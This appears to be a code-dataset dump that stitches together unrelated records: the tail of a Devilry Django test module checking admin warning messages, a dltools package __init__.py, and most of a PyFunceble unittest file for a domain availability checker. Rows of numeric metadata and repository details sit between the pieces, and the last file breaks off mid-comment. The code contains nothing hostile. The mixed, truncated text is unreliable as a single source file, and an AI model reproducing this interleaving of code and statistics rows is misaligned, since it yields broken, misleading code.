'warning: No examiners configured',
mockresponse.selector.one('#id_devilry_admin_assignment_examiner_no_examiners_on_assignment')
.alltext_normalized)
self.assertIn(
'Only configured examiners can see and correct deliveries from students.',
mockresponse.selector.one('#id_devilry_admin_assignment_examiner_no_examiners_on_assignment')
.alltext_normalized)
# Check warning links
url = reverse_cradmin_url(
instanceid='devilry_admin_assignmentadmin',
appname='examineroverview',
viewname='INDEX',
roleid=assignment.id)
self.assertEqual(
url,
mockresponse.selector.one(
'#id_devilry_admin_assignment_examiner_no_examiners_on_assignment > strong > a').get('href'))
def test_fewer_examiners_than_relatedexaminers_on_semester_note(self):
assignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_end')
baker.make('core.RelatedExaminer', period=assignment.period)
related_examiner = baker.make('core.RelatedExaminer', period=assignment.period)
baker.make('core.Examiner', relatedexaminer=related_examiner, assignmentgroup__parentnode=assignment)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
# Check warning exists
self.assertTrue(
mockresponse.selector.exists('#id_devilry_admin_assignment_examiner_on_semester_not_on_assignment'))
# Check warning text
self.assertIn(
'note: There are examiners on the semester that are not assigned to any students',
mockresponse.selector.one('#id_devilry_admin_assignment_examiner_on_semester_not_on_assignment')
.alltext_normalized)
# Check warning link
url = reverse_cradmin_url(
instanceid='devilry_admin_assignmentadmin',
appname='examineroverview',
viewname='INDEX',
roleid=assignment.id)
self.assertEqual(
url,
mockresponse.selector.one(
'#id_devilry_admin_assignment_examiner_on_semester_not_on_assignment > a').get('href'))
class TestOverviewStudentSection(TestCase, cradmin_testhelpers.TestCaseMixin):
viewclass = overview.Overview
def test_sanity_no_relatedstudents_no_other_warnings_shown(self):
assignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_end')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
# Warnings rendered
self.assertTrue(mockresponse.selector.exists(
'#id_devilry_admin_assignment_student_no_active_students_on_semester'))
# Warnings not rendered
self.assertFalse(mockresponse.selector.exists(
'#id_devilry_admin_assignment_student_no_students_on_assignment'))
self.assertFalse(mockresponse.selector.exists(
'#id_devilry_admin_assignment_student_on_semester_not_on_assignment'))
def test_sanity_no_candidates_on_assignment(self):
assignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_end')
baker.make('core.RelatedStudent', period=assignment.parentnode)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
# Warnings rendered
self.assertTrue(mockresponse.selector.exists(
'#id_devilry_admin_assignment_student_no_students_on_assignment'))
# Warnings not rendered
self.assertFalse(mockresponse.selector.exists(
'#id_devilry_admin_assignment_student_no_active_students_on_semester'))
self.assertFalse(mockresponse.selector.exists(
'#id_devilry_admin_assignment_student_on_semester_not_on_assignment'))
def test_meta_text_has_two_candidates_and_two_assignment_groups(self):
assignment = baker.make('core.Assignment')
group1 = baker.make('core.AssignmentGroup', parentnode=assignment)
group2 = baker.make('core.AssignmentGroup', parentnode=assignment)
baker.make('core.Candidate', assignment_group=group1)
baker.make('core.Candidate', assignment_group=group2)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one('#id_devilry_admin_assignment_students_meta_count_text').alltext_normalized,
'2 students organized in 2 project groups')
def test_meta_text_has_no_students(self):
assignment = baker.make('core.Assignment')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one('#id_devilry_admin_assignment_students_meta_count_text').alltext_normalized,
'No students on the assignment')
def test_meta_text_has_multiple_students_in_group(self):
assignment = baker.make('core.Assignment')
group1 = baker.make('core.AssignmentGroup', parentnode=assignment)
group2 = baker.make('core.AssignmentGroup', parentnode=assignment)
baker.make('core.Candidate', assignment_group=group1)
baker.make('core.Candidate', assignment_group=group2)
baker.make('core.Candidate', assignment_group=group2)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one('#id_devilry_admin_assignment_students_meta_count_text').alltext_normalized,
'3 students organized in 2 project groups')
def test_no_related_students_on_semester(self):
assignment = baker.make('core.Assignment')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
# Check warning exists
self.assertTrue(
mockresponse.selector.exists('#id_devilry_admin_assignment_student_no_active_students_on_semester'))
# Check warning text
self.assertIn(
'warning: Go to the semester page and add/activate students',
mockresponse.selector.one('#id_devilry_admin_assignment_student_no_active_students_on_semester')
.alltext_normalized)
# Check warning link
url = reverse_cradmin_url(
instanceid='devilry_admin_periodadmin',
appname='overview',
viewname='INDEX',
roleid=assignment.parentnode.id)
self.assertEqual(
url,
mockresponse.selector.one(
'#id_devilry_admin_assignment_student_no_active_students_on_semester > strong > a').get('href'))
def test_no_candidates_warning(self):
assignment = baker.make('core.Assignment')
baker.make('core.RelatedStudent', period=assignment.parentnode)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
# Check warning exists
self.assertTrue(mockresponse.selector.exists('#id_devilry_admin_assignment_student_no_students_on_assignment'))
# Check warning texts
self.assertIn(
'warning: No students added to the assignment',
mockresponse.selector.one('#id_devilry_admin_assignment_student_no_students_on_assignment')
.alltext_normalized)
self.assertIn(
'Only students added to an assignment can see the assignment and add deliveries',
mockresponse.selector.one('#id_devilry_admin_assignment_student_no_students_on_assignment')
.alltext_normalized)
# Check warning link
url = reverse_cradmin_url(
instanceid='devilry_admin_assignmentadmin',
appname='create_groups',
viewname='INDEX',
roleid=assignment.id)
self.assertEqual(
url,
mockresponse.selector.one(
'#id_devilry_admin_assignment_student_no_students_on_assignment > strong > a').get('href'))
def test_students_on_the_semester_that_are_not_on_the_assignment_warning(self):
assignment = baker.make('core.Assignment')
baker.make('core.RelatedStudent', period=assignment.parentnode)
related_student = baker.make('core.RelatedStudent', period=assignment.parentnode)
baker.make('core.Candidate', relatedstudent=related_student, assignment_group__parentnode=assignment)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
# Check warning exists
self.assertTrue(mockresponse.selector.exists('#id_devilry_admin_assignment_student_on_semester_not_on_assignment'))
# Check warning text
self.assertIn(
'note: There are students who are on the semester, but not on the assignment',
mockresponse.selector.one('#id_devilry_admin_assignment_student_on_semester_not_on_assignment')
.alltext_normalized)
# Check warning link
url = reverse_cradmin_url(
instanceid='devilry_admin_assignmentadmin',
appname='create_groups',
viewname='INDEX',
roleid=assignment.id)
self.assertEqual(
url,
mockresponse.selector.one(
'#id_devilry_admin_assignment_student_on_semester_not_on_assignment > a').get('href'))
| 53.085329 | 130 | 0.716336 | 3,687 | 35,461 | 6.519392 | 0.082181 | 0.034447 | 0.07322 | 0.047843 | 0.858468 | 0.832758 | 0.801348 | 0.779798 | 0.762242 | 0.737779 | 0 | 0.010207 | 0.204281 | 35,461 | 667 | 131 | 53.164918 | 0.841656 | 0.087476 | 0 | 0.615842 | 0 | 0 | 0.266373 | 0.172316 | 0 | 0 | 0 | 0.001499 | 0.150495 | 1 | 0.091089 | false | 0.029703 | 0.027723 | 0 | 0.130693 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
72a1f8b5414301a1a58e0637930e38bea7128efb | 119 | py | Python | dltools/__init__.py | DaehyunYou/sp8-delayline | 9146e82d8f363d4f8d20e4899df46f6fc97473b1 | [
"MIT"
] | null | null | null | dltools/__init__.py | DaehyunYou/sp8-delayline | 9146e82d8f363d4f8d20e4899df46f6fc97473b1 | [
"MIT"
] | null | null | null | dltools/__init__.py | DaehyunYou/sp8-delayline | 9146e82d8f363d4f8d20e4899df46f6fc97473b1 | [
"MIT"
] | null | null | null | from .hittypes import *
from .others import *
from .saclamodels import *
from .sp8models import *
from .units import *
| 19.833333 | 26 | 0.747899 | 15 | 119 | 5.933333 | 0.466667 | 0.449438 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010101 | 0.168067 | 119 | 5 | 27 | 23.8 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
72b56c161c4222ab78f40d1e7350ee3f5f71362d | 42,027 | py | Python | tests/checker/availability/test_base.py | veracioux/PyFunceble | ffa045297beb4f07e5466e7c4005cfcb897cc51d | [
"Apache-2.0"
] | 213 | 2017-11-19T16:00:29.000Z | 2022-03-30T20:51:35.000Z | tests/checker/availability/test_base.py | veracioux/PyFunceble | ffa045297beb4f07e5466e7c4005cfcb897cc51d | [
"Apache-2.0"
] | 270 | 2018-01-10T12:42:41.000Z | 2022-03-22T00:03:23.000Z | tests/checker/availability/test_base.py | veracioux/PyFunceble | ffa045297beb4f07e5466e7c4005cfcb897cc51d | [
"Apache-2.0"
] | 48 | 2017-12-09T22:53:49.000Z | 2022-01-29T15:50:52.000Z | """
The tool to check the availability or syntax of domain, IP or URL.
::
██████╗ ██╗ ██╗███████╗██╗ ██╗███╗ ██╗ ██████╗███████╗██████╗ ██╗ ███████╗
██╔══██╗╚██╗ ██╔╝██╔════╝██║ ██║████╗ ██║██╔════╝██╔════╝██╔══██╗██║ ██╔════╝
██████╔╝ ╚████╔╝ █████╗ ██║ ██║██╔██╗ ██║██║ █████╗ ██████╔╝██║ █████╗
██╔═══╝ ╚██╔╝ ██╔══╝ ██║ ██║██║╚██╗██║██║ ██╔══╝ ██╔══██╗██║ ██╔══╝
██║ ██║ ██║ ╚██████╔╝██║ ╚████║╚██████╗███████╗██████╔╝███████╗███████╗
╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═════╝╚══════╝╚═════╝ ╚══════╝╚══════╝
Tests of our availability checker base.
Author:
Nissar Chababy, @funilrys, contactTATAfunilrysTODTODcom
Special thanks:
https://pyfunceble.github.io/special-thanks.html
Contributors:
https://pyfunceble.github.io/contributors.html
Project link:
https://github.com/funilrys/PyFunceble
Project documentation:
https://pyfunceble.readthedocs.io/en/dev/
Project homepage:
https://pyfunceble.github.io/
License:
::
Copyright 2017, 2018, 2019, 2020, 2021 Nissar Chababy
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# pylint: disable=too-many-lines
import unittest
import unittest.mock
from PyFunceble.checker.availability.base import AvailabilityCheckerBase
from PyFunceble.checker.availability.status import AvailabilityCheckerStatus
from PyFunceble.checker.base import CheckerBase
from PyFunceble.config.loader import ConfigLoader
from PyFunceble.query.dns.query_tool import DNSQueryTool
class TestAvailabilityCheckerBase(unittest.TestCase):
"""
The tests of our availability checker base.
"""
def setUp(self) -> None:
"""
Setups everything needed for the tests.
"""
self.checker = AvailabilityCheckerBase()
def tearDown(self) -> None:
"""
Destroys everything needed for the tests.
"""
del self.checker
def test_set_use_extra_rules_return(self) -> None:
"""
Tests the response of the method which let us activate the special
rules filtering.
"""
given = False
actual = self.checker.set_use_extra_rules(given)
self.assertIsInstance(actual, CheckerBase)
def test_set_use_extra_rules_method(self) -> None:
"""
Tests the method which let us activate the special rules filtering.
"""
given = False
expected = False
self.checker.set_use_extra_rules(given)
actual = self.checker.use_extra_rules
self.assertEqual(expected, actual)
def test_set_use_extra_rules_attribute(self) -> None:
"""
Tests the method which let us activate the special rules filtering
through the attribute.
"""
given = False
expected = False
self.checker.use_extra_rules = given
actual = self.checker.use_extra_rules
self.assertEqual(expected, actual)
def test_set_use_extra_rules_init(self) -> None:
"""
Tests the method which let us activate the special rules filtering
through the class constructor.
"""
checker = AvailabilityCheckerBase(use_extra_rules=False)
expected = False
actual = checker.use_extra_rules
self.assertEqual(expected, actual)
def test_set_use_extra_rules_not_bool(self) -> None:
"""
Tests the method which let us activate the special rules filtering
through the attribute.
In this case, we check what happens when the given value is not a
:py:class:`bool`.
"""
given = ["Hello", "World!"]
self.assertRaises(TypeError, lambda: self.checker.set_use_extra_rules(given))
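# The set_use_* tests above and below all encode the same contract: a non-bool value
# raises TypeError, a bool value is stored, and the setter returns the checker itself
# so that calls can be chained. A minimal sketch of that pattern (an assumption for
# illustration, not PyFunceble's actual implementation) looks like this:
class _BooleanSetterSketch:
    def __init__(self) -> None:
        self.use_extra_rules = True

    def set_use_extra_rules(self, value):
        if not isinstance(value, bool):
            raise TypeError(f"<value> should be {bool}, {type(value)} given.")
        self.use_extra_rules = value
        return self  # returning self is what makes chaining possible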
def test_guess_and_set_use_extra_rules(self) -> None:
"""
Tests the method which let us guess and set the value of the
:code:`use_extra_rules` attribute.
"""
config_loader = ConfigLoader()
config_loader.custom_config = {"lookup": {"special": False}}
config_loader.start()
self.checker.guess_and_set_use_extra_rules()
expected = False
actual = self.checker.use_extra_rules
self.assertEqual(expected, actual)
del config_loader
def test_guess_and_set_use_extra_rules_config_not_loaded(self) -> None:
"""
Tests the method which let us guess and set the value of the
:code:`use_extra_rules` attribute; but for the case that the
configuration is not loaded.
"""
self.checker.guess_and_set_use_extra_rules()
expected = self.checker.STD_USE_EXTRA_RULES
actual = self.checker.use_extra_rules
self.assertEqual(expected, actual)
def test_set_use_whois_lookup_return(self) -> None:
"""
Tests the response of the method which let us activate the usage of
the WHOIS lookup method.
"""
given = False
actual = self.checker.set_use_whois_lookup(given)
self.assertIsInstance(actual, CheckerBase)
def test_set_use_whois_lookup_method(self) -> None:
"""
Tests the method which let us activate the usage of the WHOIS lookup
method.
"""
given = False
expected = False
self.checker.set_use_whois_lookup(given)
actual = self.checker.use_whois_lookup
self.assertEqual(expected, actual)
def test_set_use_whois_lookup_attribute(self) -> None:
"""
Tests the method which let us activate the usage of the WHOIS lookup
method through the attribute.
"""
given = False
expected = False
self.checker.use_whois_lookup = given
actual = self.checker.use_whois_lookup
self.assertEqual(expected, actual)
def test_set_use_whois_lookup_init(self) -> None:
"""
Tests the method which let us activate the usage of the WHOIS lookup
method through the class constructor.
"""
checker = AvailabilityCheckerBase(use_whois_lookup=False)
expected = False
actual = checker.use_whois_lookup
self.assertEqual(expected, actual)
def test_set_use_whois_lookup_not_bool(self) -> None:
"""
Tests the method which let us activate the usage of the WHOIS lookup
method.
In this case, we check what happens when the given value is not a
:py:class:`bool`.
"""
given = ["Hello", "World!"]
self.assertRaises(TypeError, lambda: self.checker.set_use_whois_lookup(given))
def test_guess_and_set_use_whois_lookup(self) -> None:
"""
Tests the method which let us guess and set the value of the
:code:`use_whois_lookup` attribute.
"""
config_loader = ConfigLoader()
config_loader.custom_config = {"lookup": {"whois": False}}
config_loader.start()
self.checker.guess_and_set_use_whois_lookup()
expected = False
actual = self.checker.use_whois_lookup
self.assertEqual(expected, actual)
del config_loader
def test_guess_and_set_use_whois_lookup_config_not_loaded(self) -> None:
"""
Tests the method which let us guess and set the value of the
:code:`use_whois_lookup` attribute; but for the case that the
configuration is not loaded.
"""
self.checker.guess_and_set_use_whois_lookup()
expected = self.checker.STD_USE_WHOIS_LOOKUP
actual = self.checker.use_whois_lookup
self.assertEqual(expected, actual)
def test_set_use_dns_lookup_return(self) -> None:
"""
Tests the response of the method which let us activate the usage of
the DNS lookup method.
"""
given = False
actual = self.checker.set_use_dns_lookup(given)
self.assertIsInstance(actual, CheckerBase)
def test_set_use_dns_lookup_method(self) -> None:
"""
Tests the method which let us activate the usage of the DNS lookup
method.
"""
given = False
expected = False
self.checker.set_use_dns_lookup(given)
actual = self.checker.use_dns_lookup
self.assertEqual(expected, actual)
def test_set_dns_lookup_attribute(self) -> None:
"""
Tests the method which let us activate the usage of the DNS lookup
method through the attribute.
"""
given = False
expected = False
self.checker.use_dns_lookup = given
actual = self.checker.use_dns_lookup
self.assertEqual(expected, actual)
def test_set_use_dns_lookup_init(self) -> None:
"""
Tests the method which let us activate the usage of the DNS lookup
method through the class constructor.
"""
checker = AvailabilityCheckerBase(use_dns_lookup=False)
expected = False
actual = checker.use_dns_lookup
self.assertEqual(expected, actual)
def test_set_dns_lookup_not_bool(self) -> None:
"""
Tests the method which let us activate the usage of the DNS lookup
method.
Here we check what happens when the given value is not a :py:class:`bool`.
"""
given = ["Hello", "World!"]
self.assertRaises(TypeError, lambda: self.checker.set_use_dns_lookup(given))
def test_guess_and_set_use_dns_lookup(self) -> None:
"""
Tests the method which let us guess and set the value of the
:code:`use_dns_lookup` attribute.
"""
config_loader = ConfigLoader()
config_loader.custom_config = {"lookup": {"dns": False}}
config_loader.start()
self.checker.guess_and_set_dns_lookup()
expected = False
actual = self.checker.use_dns_lookup
self.assertEqual(expected, actual)
del config_loader
def test_guess_and_set_use_dns_lookup_config_not_loaded(self) -> None:
"""
Tests the method which let us guess and set the value of the
:code:`use_dns_lookup` attribute; but for the case that the
configuration is not loaded.
"""
self.checker.guess_and_set_dns_lookup()
expected = self.checker.STD_USE_DNS_LOOKUP
actual = self.checker.use_dns_lookup
self.assertEqual(expected, actual)
def test_set_use_netinfo_lookup_return(self) -> None:
"""
Tests the response of the method which let us activate the usage of
the NETINFO lookup method.
"""
given = False
actual = self.checker.set_use_netinfo_lookup(given)
self.assertIsInstance(actual, CheckerBase)
def test_set_use_netinfo_lookup_method(self) -> None:
"""
Tests the method which let us activate the usage of the NETINFO lookup
method.
"""
given = False
expected = False
self.checker.set_use_netinfo_lookup(given)
actual = self.checker.use_netinfo_lookup
self.assertEqual(expected, actual)
def test_set_netinfo_lookup_attribute(self) -> None:
"""
Tests the method which let us activate the usage of the NETINFO lookup
method through the attribute.
"""
given = False
expected = False
self.checker.use_netinfo_lookup = given
actual = self.checker.use_netinfo_lookup
self.assertEqual(expected, actual)
def test_set_use_netinfo_lookup_init(self) -> None:
"""
Tests the method which let us activate the usage of the NETINFO lookup
method through the class constructor.
"""
checker = AvailabilityCheckerBase(use_netinfo_lookup=False)
expected = False
actual = checker.use_netinfo_lookup
self.assertEqual(expected, actual)
def test_set_netinfo_lookup_not_bool(self) -> None:
"""
Tests the method which let us activate the usage of the NETINFO lookup
method.
Here we check what happens when the given value is not a :py:class:`bool`.
"""
given = ["Hello", "World!"]
self.assertRaises(TypeError, lambda: self.checker.set_use_netinfo_lookup(given))
def test_guess_and_set_use_netinfo_lookup(self) -> None:
"""
Tests the method which let us guess and set the value of the
:code:`use_netinfo_lookup` attribute.
"""
config_loader = ConfigLoader()
config_loader.custom_config = {"lookup": {"netinfo": False}}
config_loader.start()
self.checker.guess_and_set_use_netinfo_lookup()
expected = False
actual = self.checker.use_netinfo_lookup
self.assertEqual(expected, actual)
del config_loader
def test_guess_and_set_use_netinfo_lookup_config_not_loaded(self) -> None:
"""
Tests the method which let us guess and set the value of the
:code:`use_netinfo_lookup` attribute; but for the case that the
configuration is not loaded.
"""
self.checker.guess_and_set_use_netinfo_lookup()
expected = self.checker.STD_USE_NETINFO_LOOKUP
actual = self.checker.use_netinfo_lookup
self.assertEqual(expected, actual)
def test_set_use_http_code_lookup_return(self) -> None:
"""
Tests the response of the method which let us activate the usage of
the HTTP Code lookup method.
"""
given = False
actual = self.checker.set_use_http_code_lookup(given)
self.assertIsInstance(actual, CheckerBase)
def test_set_use_http_code_lookup_method(self) -> None:
"""
Tests the method which let us activate the usage of the HTTP Code lookup
method.
"""
given = False
expected = False
self.checker.set_use_http_code_lookup(given)
actual = self.checker.use_http_code_lookup
self.assertEqual(expected, actual)
def test_set_use_http_code_lookup_attribute(self) -> None:
"""
Tests the method which let us activate the usage of the HTTP Code lookup
method through the attribute.
"""
given = False
expected = False
self.checker.use_http_code_lookup = given
actual = self.checker.use_http_code_lookup
self.assertEqual(expected, actual)
def test_set_use_http_code_lookup_init(self) -> None:
"""
Tests the method which let us activate the usage of the HTTP Code lookup
method through the class constructor.
"""
checker = AvailabilityCheckerBase(use_http_code_lookup=False)
expected = False
actual = checker.use_http_code_lookup
self.assertEqual(expected, actual)
def test_set_use_http_code_lookup_not_bool(self) -> None:
"""
Tests the method which let us activate the usage of the HTTP Code lookup
method.
Here we check what happens when the given value is not a :py:class:`bool`.
"""
given = ["Hello", "World!"]
self.assertRaises(
TypeError, lambda: self.checker.set_use_http_code_lookup(given)
)
def test_guess_and_set_use_http_code_lookup(self) -> None:
"""
Tests the method which let us guess and set the value of the
:code:`use_http_code_lookup` attribute.
"""
config_loader = ConfigLoader()
config_loader.custom_config = {"lookup": {"http_status_code": False}}
config_loader.start()
self.checker.guess_and_set_use_http_code_lookup()
expected = False
actual = self.checker.use_http_code_lookup
self.assertEqual(expected, actual)
del config_loader
def test_guess_and_set_use_http_code_lookup_config_not_loaded(self) -> None:
"""
Tests the method which let us guess and set the value of the
:code:`use_http_code_lookup` attribute; but for the case that the
configuration is not loaded.
"""
self.checker.guess_and_set_use_http_code_lookup()
expected = self.checker.STD_USE_HTTP_CODE_LOOKUP
actual = self.checker.use_http_code_lookup
self.assertEqual(expected, actual)
def test_set_use_reputation_lookup_return(self) -> None:
"""
Tests the response of the method which let us activate the usage of
the reputation lookup method.
"""
given = True
actual = self.checker.set_use_reputation_lookup(given)
self.assertIsInstance(actual, CheckerBase)
def test_set_use_reputation_lookup_method(self) -> None:
"""
Tests the method which let us activate the usage of the reputation
lookup method.
"""
given = True
expected = True
self.checker.set_use_reputation_lookup(given)
actual = self.checker.use_reputation_lookup
self.assertEqual(expected, actual)
def test_set_use_reputation_lookup_attribute(self) -> None:
"""
Tests the method which let us activate the usage of the reputation
lookup method through the attribute.
"""
given = True
expected = True
self.checker.use_reputation_lookup = given
actual = self.checker.use_reputation_lookup
self.assertEqual(expected, actual)
def test_set_use_reputation_lookup_init(self) -> None:
"""
Tests the method which let us activate the usage of the reputation
lookup method through the class constructor.
"""
checker = AvailabilityCheckerBase(use_reputation_lookup=True)
expected = True
actual = checker.use_reputation_lookup
self.assertEqual(expected, actual)
def test_set_use_reputation_lookup_not_bool(self) -> None:
"""
Tests the method which let us activate the usage of the reputation
lookup method.
Here we check what happens when the given value is not a :py:class:`bool`.
"""
given = ["Hello", "World!"]
self.assertRaises(
TypeError, lambda: self.checker.set_use_reputation_lookup(given)
)
def test_guess_and_set_use_reputation_lookup(self) -> None:
"""
Tests the method which let us guess and set the value of the
:code:`use_reputation_lookup` attribute.
"""
config_loader = ConfigLoader()
config_loader.custom_config = {"lookup": {"reputation": True}}
config_loader.start()
self.checker.guess_and_set_use_reputation_lookup()
expected = True
actual = self.checker.use_reputation_lookup
self.assertEqual(expected, actual)
del config_loader
def test_guess_and_set_use_reputation_lookup_config_not_loaded(self) -> None:
"""
Tests the method which let us guess and set the value of the
:code:`use_reputation_lookup` attribute; but for the case that the
configuration is not loaded.
"""
self.checker.guess_and_set_use_reputation_lookup()
expected = self.checker.STD_USE_REPUTATION_LOOKUP
actual = self.checker.use_reputation_lookup
self.assertEqual(expected, actual)
def test_set_use_whois_db_return(self) -> None:
"""
Tests the response of the method which let us activate the usage of
the WHOIS DB.
"""
given = False
actual = self.checker.set_use_whois_db(given)
self.assertIsInstance(actual, CheckerBase)
def test_set_use_whois_db_method(self) -> None:
"""
Tests the method which let us activate the usage of the WHOIS DB.
"""
given = False
expected = False
self.checker.set_use_whois_db(given)
actual = self.checker.use_whois_db
self.assertEqual(expected, actual)
def test_set_use_whois_db_attribute(self) -> None:
"""
Tests the method which let us activate the usage of the WHOIS DB
through the attribute.
"""
given = False
expected = False
self.checker.use_whois_db = given
actual = self.checker.use_whois_db
self.assertEqual(expected, actual)
def test_set_use_whois_db_init(self) -> None:
"""
Tests the method which let us activate the usage of the WHOIS DB
through the class constructor.
"""
checker = AvailabilityCheckerBase(use_whois_db=False)
expected = False
actual = checker.use_whois_db
self.assertEqual(expected, actual)
def test_set_use_whois_db_not_bool(self) -> None:
"""
Tests the method which let us activate the usage of the WHOIS DB.
Here we check what happens when the given value is not a :py:class:`bool`.
"""
given = ["Hello", "World!"]
self.assertRaises(TypeError, lambda: self.checker.set_use_whois_db(given))
def test_guess_and_set_use_whois_db(self) -> None:
"""
Tests the method which let us guess and set the value of the
:code:`use_whois_db` attribute.
"""
config_loader = ConfigLoader()
config_loader.custom_config = {"cli_testing": {"whois_db": False}}
config_loader.start()
self.checker.guess_and_set_use_whois_db()
expected = False
actual = self.checker.use_whois_db
self.assertEqual(expected, actual)
del config_loader
def test_guess_and_set_use_whois_db_config_not_loaded(self) -> None:
"""
Tests the method which let us guess and set the value of the
:code:`use_whois_db` attribute; but for the case that the
configuration is not loaded.
"""
self.checker.guess_and_set_use_whois_db()
expected = self.checker.STD_USE_WHOIS_DB
actual = self.checker.use_whois_db
self.assertEqual(expected, actual)
def test_subject_propagator(self) -> None:
"""
Tests that the subject and its IDNA counterpart are correctly
propagated.
"""
given = "äxample.org"
expected_subject = "äxample.org"
expected_idna_subject = "xn--xample-9ta.org"
self.checker.subject = given
actual_subject = self.checker.status.subject
actual_idna_propagated = [
self.checker.dns_query_tool.subject,
self.checker.whois_query_tool.subject,
self.checker.addressinfo_query_tool.subject,
self.checker.hostbyaddr_query_tool.subject,
self.checker.http_status_code_query_tool.subject,
self.checker.domain_syntax_checker.subject,
self.checker.ip_syntax_checker.subject,
self.checker.url_syntax_checker.subject,
self.checker.status.idna_subject,
]
self.assertEqual(expected_subject, actual_subject)
for actual in actual_idna_propagated:
self.assertEqual(expected_idna_subject, actual)
# Now, just make sure that when the subject is overwritten, the change is
# propagated too.
given = "äxample.net"
expected_subject = "äxample.net"
expected_idna_subject = "xn--xample-9ta.net"
self.checker.subject = given
actual = self.checker.status.subject
actual_idna_propagated = [
self.checker.dns_query_tool.subject,
self.checker.whois_query_tool.subject,
self.checker.addressinfo_query_tool.subject,
self.checker.hostbyaddr_query_tool.subject,
self.checker.http_status_code_query_tool.subject,
self.checker.domain_syntax_checker.subject,
self.checker.ip_syntax_checker.subject,
self.checker.url_syntax_checker.subject,
self.checker.status.idna_subject,
]
self.assertEqual(expected_subject, actual)
for actual in actual_idna_propagated:
self.assertEqual(expected_idna_subject, actual)
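# Side note on the IDNA values asserted above: the punycode forms can be reproduced
# with nothing but the standard library (a sketch, independent of PyFunceble's own
# conversion tooling).
def _idna_sketch():
    assert "äxample.org".encode("idna").decode("ascii") == "xn--xample-9ta.org"
    assert "äxample.net".encode("idna").decode("ascii") == "xn--xample-9ta.net"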
def test_should_we_continue_test_positive(self) -> None:
"""
Tests the method which let us check if we should continue to another
test method.
"""
given = "INVALID"
self.checker.status.status = "INACTIVE"
expected = True
actual = self.checker.should_we_continue_test(given)
self.assertEqual(expected, actual)
def test_should_we_continue_test_negative(self) -> None:
"""
Tests the method which let us check if we should continue to another
test method.
"""
given = "VALID"
self.checker.status.status = "INACTIVE"
expected = False
actual = self.checker.should_we_continue_test(given)
self.assertEqual(expected, actual)
@unittest.mock.patch.object(DNSQueryTool, "query")
def test_query_dns_record(self, dns_query_patch: unittest.mock.MagicMock) -> None:
"""
Tests the method that let us query the (right) DNS record of the given
subject.
"""
dns_query_patch.return_value = ["192.168.1.1"]
given = "example.org"
expected = {"NS": ["192.168.1.1"]}
self.checker.subject = given
actual = self.checker.query_dns_record()
self.assertEqual(expected, actual)
@unittest.mock.patch.object(DNSQueryTool, "query")
def test_query_dns_record_no_response(
self, dns_query_patch: unittest.mock.MagicMock
) -> None:
"""
Tests the method that let us query the (right) DNS record of the given
subject.
Here we test the case that there is systematically no (valid) response.
"""
dns_query_patch.return_value = []
given = "example.net"
expected = dict() # pylint: disable=use-dict-literal
self.checker.subject = given
actual = self.checker.query_dns_record()
self.assertEqual(expected, actual)
@unittest.mock.patch.object(DNSQueryTool, "query")
def test_query_dns_record_subdomain(
self, dns_query_patch: unittest.mock.MagicMock
) -> None:
"""
Tests the method that let us query the (right) DNS record of the given
subject.
"""
dns_query_patch.return_value = ["192.168.1.2"]
given = "test.example.org"
expected = {"NS": ["192.168.1.2"]}
self.checker.subject = given
actual = self.checker.query_dns_record()
self.assertEqual(expected, actual)
@unittest.mock.patch.object(DNSQueryTool, "query")
def test_query_dns_record_ptr(
self, dns_query_patch: unittest.mock.MagicMock
) -> None:
"""
Tests the method that let us query the (right) DNS record of the given
subject.
"""
dns_query_patch.return_value = ["example.org"]
given = "192.168.1.1"
expected = {"PTR": ["example.org"]}
self.checker.subject = given
actual = self.checker.query_dns_record()
self.assertEqual(expected, actual)
def test_query_dns_record_no_subject(self) -> None:
"""
Tests the method that let us query the (right) DNS record of the given
subject.
In this case, we test what happens when the subject is not set.
"""
# pylint: disable=unnecessary-lambda
self.assertRaises(TypeError, lambda: self.checker.query_dns_record())
@unittest.mock.patch.object(DNSQueryTool, "query")
def test_query_dns_record_not_valid_subject(
self, dns_query_patch: unittest.mock.MagicMock
) -> None:
"""
Tests the method that let us query the (right) DNS record of the given
subject.
Here we test the case that the given subject is not correct.
"""
dns_query_patch.return_value = []
given = "a1"
expected = dict() # pylint: disable=use-dict-literal
self.checker.subject = given
actual = self.checker.query_dns_record()
self.assertEqual(expected, actual)
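# The query_dns_record tests above boil down to one decision: an IP address is looked
# up through its PTR record, while (sub)domains fall back to another record type (NS
# in the mocked scenarios). A simplified, hypothetical record-type picker using only
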